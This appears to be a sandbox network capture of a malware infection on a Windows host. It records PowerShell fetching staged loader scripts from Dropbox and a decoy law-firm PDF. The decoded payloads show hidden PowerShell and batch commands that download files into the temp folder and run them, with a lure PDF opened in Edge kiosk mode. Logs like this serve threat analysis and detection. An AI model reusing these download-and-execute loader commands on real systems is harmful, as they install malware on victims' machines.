                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 21bc2d9733cc4d588d71f1631b0a4a74
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:09 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 162.125.69.15 | 443 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:11 UTC | 370 | OUT | GET /cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-12-10 17:40:12 UTC | 734 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733737271361738d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 125
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:11 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: c33200a6fb5240c9b3dbe1eb944ce1b5
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:12 UTC | 411 | IN | Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/0hdi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49709 | 162.125.65.18 | 443 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:18 UTC | 212 | OUT | GET /scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
2024-12-10 17:40:20 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/ [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=MzM2NjQ5NTQ2NjkxODQzNTA3ODMwODAyMTkwNTc3MjczNDE2ODM1; Path=/; Expires=Sun, 09 Dec 2029 17:40:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=sk_dFr1Gm9Ocky7pI8qEEAeg; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=sk_dFr1Gm9Ocky7pI8qEEAeg; Path=/; Expires=Wed, 10 Dec 2025 17:40:19 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=K_P7W_H7oE; Path=/; Expires=Wed, 10 Dec 2025 17:40:19 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:19 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:19 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 9e95eef4c72343c78382a24b1bb26e01
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:20 UTC    17    IN    Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
4    192.168.2.5    49712    162.125.65.15    443    5660    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp    Bytes transferred    Direction    Data
2024-12-10 17:40:22 UTC    370    OUT    GET /cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-12-10 17:40:22 UTC    734    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733737267866378d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 185
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:22 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 519
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 63b8ec134cec4baa8627b815f7a78a1d
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:22 UTC    519    IN    Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 70 64 66 5c 22 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 65 78 65 5c 22 3b 20 49 57 52 20 2d 55 72 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 73 69 72 67 72 68 35 77 63 6f 74 72 39 34 76 72 74 37 75 34 79 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 67 79 38 36 6c 6b 66 73 77 61 69 63 31 72
                                                                                                                                                                                                                                                                                              Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1r


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
5    192.168.2.5    49719    162.125.65.18    443    7552    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp    Bytes transferred    Direction    Data
2024-12-10 17:40:23 UTC    764    OUT    GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:40:24 UTC    4094    IN    HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; media-src https://* blob: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: db [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=MjQwMzQxNzM2ODM5MzA0MDU2NTA4NTUxMzQ3NDE4OTY1NzA0NjQz; Path=/; Expires=Sun, 09 Dec 2029 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=pHSx4GJawuFBnnq83dn0114j; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=pHSx4GJawuFBnnq83dn0114j; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=6iXgEsDCm8; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:24 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:24 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: fa23cea16e9a4a2cbe997c258ad08868
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:24 UTC    17    IN    Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
6    192.168.2.5    49736    162.159.61.3    443    7552    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp    Bytes transferred    Direction    Data
2024-12-10 17:40:26 UTC    245    OUT    POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
2024-12-10 17:40:26 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-10 17:40:26 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 10 Dec 2024 17:40:26 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8eff05234bdf191e-EWR
alt-svc: h3=":443"; ma=86400
2024-12-10 17:40:26 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49737 | 172.64.41.3 | 443 | 7552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:26 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-10 17:40:26 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-10 17:40:26 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 10 Dec 2024 17:40:26 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8eff05234b3e0c9c-EWR
alt-svc: h3=":443"; ma=86400
2024-12-10 17:40:26 UTC | 468 | IN | Data Ascii: wwwgstaticcom&(c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49734 | 162.125.69.15 | 443 | 7552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:26 UTC | 888 | OUT | GET /cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1 HTTP/1.1
Host: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:40:27 UTC | 668 | IN | HTTP/1.1 200 OK
Content-Type: application/binary
Accept-Ranges: bytes
Cache-Control: max-age=60
Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
Etag: 1733684767914485d
Pragma: public
Referrer-Policy: no-referrer
Vary: Origin
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex, nofollow, noimageindex
X-Server-Response-Time: 162
Date: Tue, 10 Dec 2024 17:40:26 GMT
Server: envoy
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 106848
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 6e492bb80eae4c39b164070bd18449c5
Connection: close
                                                                                                                                                                                                                                                                                              Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d 8c 89 2b ef de 98 17 aa 63 ab 57 85 6b 77 d5 58 c1 e7 b6 08 a4 4f 1e 98 39 36 b1 eb b5 93 6b a7 4e bc be 7f 62 77 98 e5 ed 94 56
                                                                                                                                                                                                                                                                                              Data Ascii: qr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/+cWkwXO96kNbwV
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 34 34 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 32 20 30 20 6f 62 6a 0d 0a 5b 20 32 37 38 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 33 20 30 20 6f 62 6a 0d 0a 5b 20 32 32 36 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 34 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 31 39 32 37 32 2f 4c 65 6e 67 74 68 31 20 38 33 31 36 34 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c ec 7d 07 5c 94 57 ba fe 39 df 37 8d 29 cc 0c 32 b4 01 66 c6 01 44 47 c0 82 0a 6a 64 94 62 ef 8e 01 6c 20 a0 68 50 51 b1 c4 a8 21 31 d1 84 68 7a af a6 9a 8d 29 c3 68 22 9a 66 b2 a6 6c 8a e9 65 93 4d 71 37 9b 4d 36 31 6d 37 cd 28 dc e7 7c ef 1c db 6e f2 df dd bb 77 73 73 ff f3 c2 33 cf 73 de 53 be 53 df ef f0 13 7e 32 ce 18 73 e0 43 c7 6a ca 47
                                                                                                                                                                                                                                                                                              Data Ascii: 44] endobj82 0 obj[ 278] endobj83 0 obj[ 226] endobj84 0 obj<</Filter/FlateDecode/Length 19272/Length1 83164>>streamx}\W97)2fDGjdbl hPQ!1hz)h"fleMq7M61m7(|nwss3sSS~2sCjG
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC267INData Raw: f8 ac 53 54 f2 d6 9b 15 3f da 50 9d 7c 2e 4e f3 3d 15 d2 ab 73 d7 6e e2 d2 c6 8e a2 fd 69 0b f6 78 f5 ed c1 5b 38 b0 e0 ac eb b9 2b fb 66 4c 12 0e 6b 36 28 7c 8d e5 c0 3b 3f 1c be d1 74 de ac bc 43 e2 62 17 39 59 ec 42 c3 e6 9f 84 b0 fd 9b d3 f5 27 b7 fa 26 27 88 92 a2 f5 28 ed b0 81 6c c5 17 db 9a 1e 51 40 92 ea 9a 8d d8 9e 34 ed 75 21 fd ab 07 0a c4 9e 02 c2 c3 c7 71 7d 66 d0 16 72 7a 70 e0 86 79 7d e8 d1 e5 95 ef 0a 37 7e cb cf 1b 3a c1 a3 61 d1 37 43 96 90 e1 26 c3 6d c5 6d c8 a0 92 ba 85 4e 1f 3e f2 5e dc b0 d0 dd f0 4b bb fc 0f e6 74 ad 15 48 50 cc e5 ac 75 79 34 e4 ae 1b ff cd e1 b0 53 45 4b ea ec 7e b7 f3 d9 92 19 d3 53 97 46 cf eb b7 ef d1 90 c8 11 a2 ce 8b ee 39 e5 df 38 b9 21 55 16 3a f4 e1 a0 e3 01 61 03 2f 77 79 ca 8b b7 f3 7a 67 19 df c0 c2
                                                                                                                                                                                                                                                                                              Data Ascii: ST?P|.N=snix[8+fLk6(|;?tCb9YB'&'(lQ@4u!q}frzpy}7~:a7C&mmN>^KtHPuy4SEK~SF98!U:a/wyzg
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                              Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49738 | 162.159.61.3 | 443 | 7552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:26 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
2024-12-10 17:40:27 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
